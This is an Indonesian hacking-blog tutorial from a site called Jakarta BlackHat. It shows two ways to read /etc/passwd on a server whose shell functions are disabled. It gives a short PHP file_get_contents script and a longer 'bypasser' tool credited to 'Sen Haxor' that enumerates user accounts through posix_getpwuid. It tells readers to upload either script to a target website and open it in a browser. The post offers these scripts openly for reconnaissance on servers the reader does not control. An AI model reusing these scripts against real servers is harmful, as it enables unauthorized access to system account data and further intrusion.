Manual Bypassing /etc/passwd - Jakarta BlackHat
BLANTERWISDOM101

Manual Bypassing /etc/passwd

Tuesday, August 28, 2018

Assalamualaikum wr.wb

Hello friend kali ini saya akan ngasih 2 cara Bypass /etc/passwd secara manual.Terkadang ada beberapa server yang mendisable fungsi " Shell execute " sehingga perintah " cat /etc/passwd " tidak akan berjalan untuk itu di bawah ini saya akan membagi 2 cara.

Langsung saja oke :

1.Yang pertama kita akan menggunakan perintah " file_get_contents " .

Lalu kenapa ?

Karena pada server tersebut atau kebanyakan server mendisable fungsi " shell executetable " sedangkan pada alternatif ini kita menggunakan fungsi php yang masih bisa berjalan pada server tersebut.
Berikut scriptnya :



1
2
3
<?php
echo file_get_contents('/etc/passwd');
?>


Lalu simpan Script tersebut dengan exstensi php.
Setelah itu kamu upload ke server yang ingin kamu lihat list usernya.
Setelah itu buka file ini di direktori yang kamu upload.
Contoh :
( www.site.com/read.php ) nanti pada halaman ini akan terlihat isi dari file /etc/passwd.

2.Cara yang kedua adalah menggunakan script yang dibuat oleh Sen Haxor berikut scriptnya


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<title>Etc/Passwd Bypass Tool by Sen Haxor</title>
<body background="#fff">
<form>
<p align="center" dir="rtl"><font color="#008080">
<font color="red" face="Tahoma"><h1>/etc/passwd Bypasser By Sen Haxor</h1></font></a></font><font color="red">
<font color="red"><span lang="ar-sa">
</form>
<form>
<td width="50%"><font color="black"><?php echo 'Server IP :<b>'.$_SERVER["SERVER_ADDR"].'</b>';?></font></td>
<td width="50%"><select size="1" name="plugin"><option value="plugin">/etc/passwd</option></option></select></td>
<td width="100%" colspan="2">
<p align="center"><input type="submit" value="Submit"></td>
</form>
<textarea method='POST'  rows=20 cols=100 wrap=off>
<?php
error_reporting(0);
 if ($_GET['plugin'] )
for($uid=0;$uid<60000;$uid++){   //cat /etc/passwd
$ara = posix_getpwuid($uid);
if (!empty($ara)) {
while (list ($key, $val) = each($ara)){
print "$val:";
}
print "n";
}
}
echo "</textarea>";
?>


Simpan script ini dengan exstensi php lalu upload ke server yang kamu tuju.

Berikut penampakan scriptnya :


Itulah 2 cara manual Bypass /etc/passwd  jika fungsi shell_exec tidak diizinkan / di-disable oleh server.

Sekian tutorial kali ini semoga bermanfaat :)

Share This :

0 Comments

Subscribe New Articles

Subscribe to Our Newsletter for Get Quality Updates on Your Email. It's Free!